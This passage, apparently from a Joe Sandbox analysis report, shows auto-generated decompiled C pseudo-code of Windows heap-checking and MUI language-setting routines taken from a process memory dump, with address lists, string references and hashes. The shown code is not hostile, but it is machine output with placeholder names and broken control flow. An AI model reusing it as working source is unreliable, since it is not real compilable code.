											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E030E1411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E03047D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E03047D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E030E1411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E0305174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E0304B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E03047D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E030E14FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E030499BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E0304A830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E0305ABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}



















































































                        0x0304a309
                        0x0304a316
                        0x0304a319
                        0x0304a31d
                        0x0304a32d
                        0x0304a331
                        0x03091e0d
                        0x03091e10
                        0x0304a3cb
                        0x0304a3cb
                        0x0304a3bd
                        0x0304a3c3
                        0x0304a3c3
                        0x0304a33a
                        0x03091e17
                        0x03091e1b
                        0x03091e1d
                        0x03091e2f
                        0x03091e34
                        0x03091e36
                        0x03091e3c
                        0x03091e3c
                        0x03091e3c
                        0x03091e3c
                        0x03091e36
                        0x03091e42
                        0x03091e45
                        0x03091e47
                        0x0304a3f8
                        0x0304a3f8
                        0x0304a3fb
                        0x0304a3fd
                        0x03091e50
                        0x0304a403
                        0x0304a411
                        0x0304a411
                        0x0304a411
                        0x0304a41e
                        0x0304a420
                        0x0304a424
                        0x0304a427
                        0x0304a7c9
                        0x0304a7cd
                        0x0304a7d2
                        0x0304a7d9
                        0x0304a7e0
                        0x0304a7e3
                        0x0304a7ed
                        0x0304a7f3
                        0x0304a7f9
                        0x0304a7ff
                        0x0304a802
                        0x0304a807
                        0x0304a809
                        0x0304a809
                        0x0304a809
                        0x0304a80f
                        0x0304a80f
                        0x0304a812
                        0x0304a81c
                        0x0304a821
                        0x0304a824
                        0x0304a42d
                        0x0304a42d
                        0x0304a42d
                        0x0304a42d
                        0x0304a42d
                        0x0304a436
                        0x0304a43a
                        0x0304a609
                        0x0304a60d
                        0x0304a612
                        0x0304a616
                        0x0304a61a
                        0x03091e57
                        0x03091e59
                        0x00000000
                        0x00000000
                        0x03091e5f
                        0x0304a620
                        0x0304a627
                        0x03091e64
                        0x03091e66
                        0x03091e6c
                        0x03091e72
                        0x03091e76
                        0x03091e95
                        0x03091e9a
                        0x03091e78
                        0x03091e8d
                        0x03091e92
                        0x03091ea0
                        0x03091ea5
                        0x03091eaa
                        0x03091eb2
                        0x03091eb6
                        0x03091eb9
                        0x03091eb9
                        0x03091ebe
                        0x03091ec2
                        0x03091ec2
                        0x03091e66
                        0x0304a62d
                        0x0304a633
                        0x0304a636
                        0x0304a63a
                        0x0304a63c
                        0x0304a640
                        0x0304a642
                        0x0304a644
                        0x0304a644
                        0x0304a644
                        0x0304a64d
                        0x0304a64d
                        0x0304a651
                        0x0304a655
                        0x03091eca
                        0x03091ed1
                        0x00000000
                        0x00000000
                        0x03091ed7
                        0x00000000
                        0x0304a65b
                        0x0304a669
                        0x0304a66e
                        0x0304a670
                        0x00000000
                        0x00000000
                        0x0304a676
                        0x0304a67b
                        0x0304a680
                        0x0304a682
                        0x03091f1a
                        0x0304a688
                        0x0304a688
                        0x0304a688
                        0x0304a68a
                        0x0304a68d
                        0x03091f24
                        0x03091f2a
                        0x03091f31
                        0x03091f43
                        0x03091f43
                        0x03091f31
                        0x0304a693
                        0x0304a697
                        0x0304a69d
                        0x0304a6a0
                        0x0304a6a6
                        0x0304a6a8
                        0x0304a6a8
                        0x0304a6a8
                        0x0304a6a8
                        0x0304a6b2
                        0x0304a6b7
                        0x0304a6c1
                        0x0304a6c6
                        0x0304a6d2
                        0x0304a6d9
                        0x0304a6e3
                        0x0304a6e6
                        0x0304a6eb
                        0x0304a6ed
                        0x0304a6ed
                        0x0304a6ed
                        0x0304a6ed
                        0x0304a6f3
                        0x0304a6f8
                        0x0304a702
                        0x0304a70a
                        0x0304a70e
                        0x0304a71a
                        0x0304a71e
                        0x03091fcb
                        0x03091fcf
                        0x03091fdd
                        0x03091fe3
                        0x03091fe3
                        0x0304a724
                        0x0304a728
                        0x0304a72a
                        0x0304a72d
                        0x0304a737
                        0x0304a73a
                        0x0304a73c
                        0x0304a742
                        0x0304a748
                        0x03091f4d
                        0x03091f50
                        0x03091f56
                        0x03091f5c
                        0x03091f5f
                        0x03091f7e
                        0x03091f83
                        0x03091f61
                        0x03091f76
                        0x03091f7b
                        0x03091f89
                        0x03091f8e
                        0x03091f93
                        0x03091f94
                        0x03091f9a
                        0x03091f9c
                        0x03091f9e
                        0x03091fa1
                        0x03091fa1
                        0x03091fa6
                        0x03091fa6
                        0x03091f50
                        0x0304a74e
                        0x0304a751
                        0x0304a754
                        0x0304a75d
                        0x0304a75e
                        0x0304a762
                        0x0304a767
                        0x03091faf
                        0x03091fb0
                        0x03091fb9
                        0x03091fbe
                        0x03091fc2
                        0x03091fc2
                        0x0304a76d
                        0x0304a76d
                        0x0304a775
                        0x0304a778
                        0x0304a77d
                        0x0304a77d
                        0x0304a71e
                        0x0304a782
                        0x0304a787
                        0x0304a789
                        0x03091ff3
                        0x0304a78f
                        0x0304a78f
                        0x0304a78f
                        0x0304a791
                        0x0304a794
                        0x03091ffd
                        0x03092006
                        0x0309200c
                        0x03092017
                        0x03092019
                        0x03092024
                        0x03092024
                        0x03092024
                        0x03092047
                        0x03092047
                        0x0309200c
                        0x0304a79a
                        0x0304a79f
                        0x0304a7a4
                        0x0304a7a9
                        0x0304a7ab
                        0x0309205a
                        0x0304a7b1
                        0x0304a7b1
                        0x0304a7b1
                        0x0304a7b3
                        0x0304a7b6
                        0x00000000
                        0x0304a7bc
                        0x03092066
                        0x03092068
                        0x03092073
                        0x03092073
                        0x03092073
                        0x03092078
                        0x03092079
                        0x0309207d
                        0x00000000
                        0x0309207d
                        0x0304a7b6
                        0x0304a440
                        0x0304a440
                        0x0304a440
                        0x0304a446
                        0x0304a44c
                        0x0304a44f
                        0x0304a453
                        0x0304a455
                        0x030920b3
                        0x030920b9
                        0x030920b9
                        0x0304a45d
                        0x0304a460
                        0x0304a464
                        0x0304a466
                        0x0304a46b
                        0x0304a46f
                        0x0304a471
                        0x0304a471
                        0x0304a471
                        0x0304a474
                        0x0304a479
                        0x0304a47d
                        0x0304a47f
                        0x03092229
                        0x0309222f
                        0x0304a3c8
                        0x0304a3c8
                        0x0304a3ca
                        0x0304a3ca
                        0x00000000
                        0x0304a3ca
                        0x03092235
                        0x0309223a
                        0x0309223a
                        0x00000000
                        0x00000000
                        0x03092240
                        0x03092246
                        0x0309224a
                        0x03092269
                        0x0309226e
                        0x0309224c
                        0x03092261
                        0x03092266
                        0x03092274
                        0x03092279
                        0x0309227e
                        0x03092286
                        0x03092288
                        0x0309228d
                        0x0309228d
                        0x03092292
                        0x03092292
                        0x03092295
                        0x03092295
                        0x00000000
                        0x03092295
                        0x0304a485
                        0x0304a489
                        0x0304a48b
                        0x0304a48f
                        0x0304a493
                        0x0304a497
                        0x0304a49b
                        0x0304a4bb
                        0x0304a4bb
                        0x0304a4bd
                        0x0304a4ff
                        0x0304a4ff
                        0x0304a501
                        0x0304a505
                        0x0304a50f
                        0x0304a517
                        0x0304a51b
                        0x0304a527
                        0x0304a52b
                        0x03092182
                        0x03092185
                        0x03092193
                        0x03092199
                        0x03092199
                        0x0304a531
                        0x0304a535
                        0x0304a538
                        0x0304a548
                        0x0304a54b
                        0x0304a54d
                        0x0304a553
                        0x0304a559
                        0x03092100
                        0x03092103
                        0x03092109
                        0x0309210f
                        0x03092112
                        0x03092131
                        0x03092136
                        0x03092114
                        0x03092129
                        0x0309212e
                        0x0309213c
                        0x03092141
                        0x03092147
                        0x0309214d
                        0x03092151
                        0x03092154
                        0x03092154
                        0x03092159
                        0x03092159
                        0x03092103
                        0x0304a55f
                        0x0304a562
                        0x0304a565
                        0x0304a567
                        0x03092162
                        0x0304a56d
                        0x0304a574
                        0x0304a575
                        0x0304a579
                        0x0304a57e
                        0x03092169
                        0x0309216a
                        0x03092170
                        0x03092175
                        0x03092179
                        0x03092179
                        0x0304a57e
                        0x0304a584
                        0x0304a58f
                        0x0304a58f
                        0x0304a52b
                        0x0304a5ad
                        0x0304a5bc
                        0x0304a5c1
                        0x0304a5c6
                        0x0304a5cb
                        0x0304a5cd
                        0x030921a9
                        0x0304a5d3
                        0x0304a5d3
                        0x0304a5d3
                        0x0304a5d5
                        0x0304a5d8
                        0x030921b3
                        0x030921bc
                        0x030921c2
                        0x030921cd
                        0x030921cf
                        0x030921da
                        0x030921da
                        0x030921da
                        0x030921f7
                        0x030921f7
                        0x030921c2
                        0x0304a5de
                        0x0304a5e3
                        0x0304a5e8
                        0x0304a5ea
                        0x0309220a
                        0x0304a5f0
                        0x0304a5f0
                        0x0304a5f0
                        0x0304a5f2
                        0x0304a5f5
                        0x03092219
                        0x0309221b
                        0x0309208c
                        0x0309208c
                        0x0309208c
                        0x03092095
                        0x03092096
                        0x03092097
                        0x03092098
                        0x030920a4
                        0x030920a5
                        0x030920a9
                        0x030920a9
                        0x00000000
                        0x0304a5f5
                        0x0304a4bf
                        0x0304a4d3
                        0x0304a4d8
                        0x0304a4da
                        0x03091ede
                        0x03091ede
                        0x03091ee4
                        0x03091ee9
                        0x00000000
                        0x00000000
                        0x03091f07
                        0x00000000
                        0x03091f07
                        0x0304a4e0
                        0x0304a4e5
                        0x0304a4e7
                        0x030920cb
                        0x0304a4ed
                        0x0304a4ed
                        0x0304a4ed
                        0x0304a4f2
                        0x0304a4f5
                        0x030920d5
                        0x030920de
                        0x030920e4
                        0x030920f6
                        0x030920f6
                        0x030920e4
                        0x0304a4fb
                        0x00000000
                        0x0304a4fb
                        0x0304a4a1
                        0x0304a4a4
                        0x0304a4a8
                        0x00000000
                        0x00000000
                        0x0304a4aa
                        0x0304a4ac
                        0x00000000
                        0x00000000
                        0x0304a4b2
                        0x0304a4b5
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0304a4b5
                        0x0304a43a
                        0x0304a340
                        0x0304a346
                        0x0304a600
                        0x00000000
                        0x0304a600
                        0x0304a34f
                        0x0304a351
                        0x0304a358
                        0x0304a3c6
                        0x00000000
                        0x0304a371
                        0x0304a37a
                        0x0304a37f
                        0x0304a382
                        0x0304a384
                        0x0304a394
                        0x00000000
                        0x0304a396
                        0x0304a399
                        0x0304a3a7
                        0x0304a3b0
                        0x0304a3b4
                        0x0304a3bb
                        0x0304a3d2
                        0x0304a3da
                        0x0304a3df
                        0x0304a3e1
                        0x0304a3e5
                        0x0304a3ea
                        0x0304a3f0
                        0x0304a3f0
                        0x0304a3e1
                        0x00000000
                        0x0304a3bb
                        0x0304a394

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                        • API String ID: 0-523794902
                        • Opcode ID: 909d7cbcc1b215477614d52ccde0d67a45bacf0fdf90d9e266c4a6fe25d73bf7
                        • Instruction ID: 0c77d0c07d5fed361e8bb5b6bac6a73e339a87b932842bbf28faef56b90bd922
                        • Opcode Fuzzy Hash: 909d7cbcc1b215477614d52ccde0d67a45bacf0fdf90d9e266c4a6fe25d73bf7
                        • Instruction Fuzzy Hash: FD4202B57063419FDB14DF28C484B6ABBE9FF88604F08496EF8868B352D734DA81CB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03033D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                        Download Yara Rule
                        C-Code - Quality: 96%
                        			E03033D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E03031B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E03031B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E03031B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E03031B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E03031B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L03044620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0306F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E03071370(_t276, 0x3004e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0306BB40(0,  &_v68, _t170);
									if(L030343C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0306BB40(_t257,  &_v68, _t243);
								if(L030343C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E03071370(_t278, 0x3004e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L03044620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0306F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E03071370(_v16, 0x3004e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0306BB40(_t262,  &_v68, _t244);
								if(L030343C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E03071370(_t282, 0x3004e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0306BB40(_t262,  &_v68, _t201);
							if(L030343C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L03044620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0306F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E03071370(_t280, 0x3004e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0306BB40(_t267,  &_v68, _t245);
							if(L030343C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E03071370(_t284, 0x3004e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0306BB40(_t267,  &_v68, _t224);
						if(L030343C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                        0x03033d3c
                        0x03033d42
                        0x03033d44
                        0x03033d46
                        0x03033d49
                        0x03033d4c
                        0x03033d4f
                        0x03033d52
                        0x03033d55
                        0x03033d58
                        0x03033d5b
                        0x03033d5f
                        0x03033d61
                        0x03033d66
                        0x03088213
                        0x03088218
                        0x03034085
                        0x03034088
                        0x0303408e
                        0x03034094
                        0x0303409a
                        0x030340a0
                        0x030340a6
                        0x030340a9
                        0x030340af
                        0x030340b6
                        0x030340bd
                        0x030340bd
                        0x03033d83
                        0x0308821f
                        0x03088229
                        0x03088238
                        0x03088238
                        0x0308823d
                        0x0308823d
                        0x03033da0
                        0x03033daf
                        0x03033db5
                        0x03033dba
                        0x03033dba
                        0x03033dd4
                        0x03033e94
                        0x03033eab
                        0x03033f6d
                        0x03033f84
                        0x0303406b
                        0x0303406b
                        0x0303406e
                        0x0303406e
                        0x03034070
                        0x03034074
                        0x03088351
                        0x03088351
                        0x0303407a
                        0x0303407f
                        0x0308835d
                        0x03088370
                        0x03088377
                        0x03088379
                        0x0308837c
                        0x0308837c
                        0x0308835d
                        0x00000000
                        0x0303407f
                        0x03033f8a
                        0x03033f8d
                        0x03033f90
                        0x03033f95
                        0x0308830d
                        0x0308830f
                        0x03033f9b
                        0x03033fac
                        0x03033fae
                        0x03033fb1
                        0x03033fb1
                        0x03033fb6
                        0x03088317
                        0x0308831a
                        0x00000000
                        0x03033fbc
                        0x03033fc1
                        0x03033fc9
                        0x03033fd7
                        0x03033fda
                        0x03033fdd
                        0x03034021
                        0x03034021
                        0x03034029
                        0x03034030
                        0x03034044
                        0x03034046
                        0x03034046
                        0x03034044
                        0x03034049
                        0x03088327
                        0x03088334
                        0x03088339
                        0x0308833c
                        0x0303404f
                        0x0303404f
                        0x0303404f
                        0x03034051
                        0x03034056
                        0x03034063
                        0x03034063
                        0x03034068
                        0x00000000
                        0x03034068
                        0x03033fdf
                        0x03033fe2
                        0x03033fe4
                        0x03033fe7
                        0x03033fef
                        0x03034003
                        0x03034005
                        0x03034005
                        0x0303400c
                        0x03034013
                        0x03034016
                        0x03034017
                        0x0303401b
                        0x0303401e
                        0x00000000
                        0x0303401e
                        0x03033fb6
                        0x03033eb1
                        0x03033eb4
                        0x03033eb7
                        0x03033ebc
                        0x030882a9
                        0x030882ab
                        0x03033ec2
                        0x03033ed3
                        0x03033ed5
                        0x03033ed8
                        0x03033ed8
                        0x03033edd
                        0x030882b3
                        0x030882b6
                        0x00000000
                        0x03033ee3
                        0x03033ee8
                        0x03033eed
                        0x03033ef0
                        0x03033ef3
                        0x03033f02
                        0x03033f05
                        0x03033f08
                        0x030882c0
                        0x030882c3
                        0x030882c5
                        0x030882c8
                        0x030882d0
                        0x030882e4
                        0x030882e6
                        0x030882e6
                        0x030882ed
                        0x030882f4
                        0x030882f7
                        0x030882f8
                        0x030882fc
                        0x030882ff
                        0x030882ff
                        0x03033f0e
                        0x03033f11
                        0x03033f16
                        0x03033f1d
                        0x03033f31
                        0x03088307
                        0x03088307
                        0x03033f31
                        0x03033f39
                        0x03033f48
                        0x03033f4d
                        0x03033f50
                        0x03033f50
                        0x03033f53
                        0x03033f58
                        0x03033f65
                        0x03033f65
                        0x03033f6a
                        0x00000000
                        0x03033f6a
                        0x03033edd
                        0x03033dda
                        0x03033ddd
                        0x03033de0
                        0x03033de5
                        0x03088245
                        0x03033deb
                        0x03033df7
                        0x03033dfc
                        0x03033dfe
                        0x03033e01
                        0x03033e01
                        0x03033e06
                        0x0308824d
                        0x0308824f
                        0x03088254
                        0x00000000
                        0x03033e0c
                        0x03033e11
                        0x03033e16
                        0x03033e19
                        0x03033e29
                        0x03033e2c
                        0x03033e2f
                        0x0308825c
                        0x0308825f
                        0x03088261
                        0x03088264
                        0x0308826c
                        0x03088280
                        0x03088282
                        0x03088282
                        0x03088289
                        0x03088290
                        0x03088293
                        0x03088294
                        0x03088298
                        0x0308829b
                        0x0308829b
                        0x03033e35
                        0x03033e38
                        0x03033e3d
                        0x03033e44
                        0x03033e58
                        0x030882a3
                        0x030882a3
                        0x03033e58
                        0x03033e60
                        0x03033e6f
                        0x03033e74
                        0x03033e77
                        0x03033e77
                        0x03033e7a
                        0x03033e7f
                        0x03033e8c
                        0x03033e8c
                        0x03033e91
                        0x00000000
                        0x03033e91

                        Strings
                        • Kernel-MUI-Language-Allowed, xrefs: 03033DC0
                        • Kernel-MUI-Language-Disallowed, xrefs: 03033E97
                        • WindowsExcludedProcs, xrefs: 03033D6F
                        • Kernel-MUI-Number-Allowed, xrefs: 03033D8C
                        • Kernel-MUI-Language-SKU, xrefs: 03033F70
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                        • API String ID: 0-258546922
                        • Opcode ID: dfd09d35d32deed8f9ec286a2253d2a85b5f6706f8a7704868508860fa040669
                        • Instruction ID: e965e0a7ee6ae568d3de6438658013cbb60ffcbe0da465599c370a1c2c0d9f65
                        • Opcode Fuzzy Hash: dfd09d35d32deed8f9ec286a2253d2a85b5f6706f8a7704868508860fa040669
                        • Instruction Fuzzy Hash: FCF16CB6D02219EFCB11DF99C980AEEBBFDFF49650F14446AE505AB250D7749E00CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030240E1 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                        Download Yara Rule
                        C-Code - Quality: 29%
                        			E030240E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0302B150();
					} else {
						E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0302B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E0302B150(", passed to %s", _t29);
					}
					_push("\n");
					E0302B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x3116378 = 1;
						asm("int3");
						 *0x3116378 = 0;
					}
					return 0;
				}
				return 1;
			}





                        0x030240e6
                        0x030240e8
                        0x030240f1
                        0x0308042d
                        0x0308044c
                        0x03080451
                        0x0308042f
                        0x03080444
                        0x03080449
                        0x0308045d
                        0x03080466
                        0x0308046e
                        0x03080474
                        0x03080475
                        0x0308047a
                        0x0308048a
                        0x0308048c
                        0x03080493
                        0x03080494
                        0x03080494
                        0x00000000
                        0x0308049b
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
